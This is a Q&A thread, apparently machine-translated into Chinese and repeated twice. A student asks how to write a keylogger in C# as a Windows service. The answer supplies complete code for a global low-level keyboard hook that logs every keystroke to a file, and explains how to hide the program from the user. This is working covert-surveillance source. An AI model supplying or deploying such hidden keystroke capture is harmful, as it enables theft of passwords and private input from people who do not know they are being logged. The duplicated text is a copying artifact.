Windows 服务键盘记录器
Windows Service Keylogger
我有一个大学项目需要用 c# 创建某种键盘记录器,我的意思是从用户那里获取所有键盘输入并将它们放在一个文件中,在这种情况下输入文本也需要被加密。此应用程序需要是 windows 服务,我是 windows 服务的新手,但我已使用 Visual Studio 2015.The 问题成功创建了 windows 服务现在是键盘记录器,我已经搜索了很长时间,但我见过的大多数键盘记录器都是使用 windows 表单而不是 windows 服务开发的。我有这个功能:
protected override void OnStart(string[] args)
{
System.IO.File.Create(AppDomain.CurrentDomain.BaseDirectory + "OnStart.txt");
}
我在这里所做的是,当服务启动时,它会在将保存或记录用户所有输入的应用程序目录中创建一个名为 Output 的新 .txt 文件。
有人可以帮助我或将我重定向到某个地方,以便我可以使用 windows 服务创建一个简单的键盘记录器吗?我已经设法使用计时器创建了一个带有 windows 表单的键盘记录器,它每秒保存一次数据,但是使用 windows 服务对我来说似乎有点困难。
从 this question 看来,出于安全原因,可能无法通过服务执行此操作。
但是,您可以创建一个使用键盘挂钩且不显示任何控制台或 windows 的程序,这意味着它将对用户隐藏(就像服务一样)。
为此,首先声明一些字段:
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
然后导入这些本地方法:
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
创建这些方法,其中 HookCallback 将处理任何检测到的按键操作(因此在评论中写入文件)
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
var keyName = Enum.GetName(typeof(Keys), vkCode);
var path = @"C:\test\logfile.txt";
// Handle the key press here
var text = ((Keys)vkCode).ToString();
File.AppendAllText(path, text);
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
SetHook基本帮我们订阅了键盘钩子:
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
最后,将这些行添加到您的 Main 方法中:
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
现在要使程序不可见,只需将 Output Type 属性 更改为 Windows Application 而不是 Console Application。
希望对你有所帮助
我有一个大学项目需要用 c# 创建某种键盘记录器,我的意思是从用户那里获取所有键盘输入并将它们放在一个文件中,在这种情况下输入文本也需要被加密。此应用程序需要是 windows 服务,我是 windows 服务的新手,但我已使用 Visual Studio 2015.The 问题成功创建了 windows 服务现在是键盘记录器,我已经搜索了很长时间,但我见过的大多数键盘记录器都是使用 windows 表单而不是 windows 服务开发的。我有这个功能:
protected override void OnStart(string[] args)
{
System.IO.File.Create(AppDomain.CurrentDomain.BaseDirectory + "OnStart.txt");
}
我在这里所做的是,当服务启动时,它会在将保存或记录用户所有输入的应用程序目录中创建一个名为 Output 的新 .txt 文件。
有人可以帮助我或将我重定向到某个地方,以便我可以使用 windows 服务创建一个简单的键盘记录器吗?我已经设法使用计时器创建了一个带有 windows 表单的键盘记录器,它每秒保存一次数据,但是使用 windows 服务对我来说似乎有点困难。
从 this question 看来,出于安全原因,可能无法通过服务执行此操作。
但是,您可以创建一个使用键盘挂钩且不显示任何控制台或 windows 的程序,这意味着它将对用户隐藏(就像服务一样)。
为此,首先声明一些字段:
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
然后导入这些本地方法:
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
创建这些方法,其中 HookCallback 将处理任何检测到的按键操作(因此在评论中写入文件)
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
var keyName = Enum.GetName(typeof(Keys), vkCode);
var path = @"C:\test\logfile.txt";
// Handle the key press here
var text = ((Keys)vkCode).ToString();
File.AppendAllText(path, text);
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
SetHook基本帮我们订阅了键盘钩子:
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
最后,将这些行添加到您的 Main 方法中:
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
现在要使程序不可见,只需将 Output Type 属性 更改为 Windows Application 而不是 Console Application。
希望对你有所帮助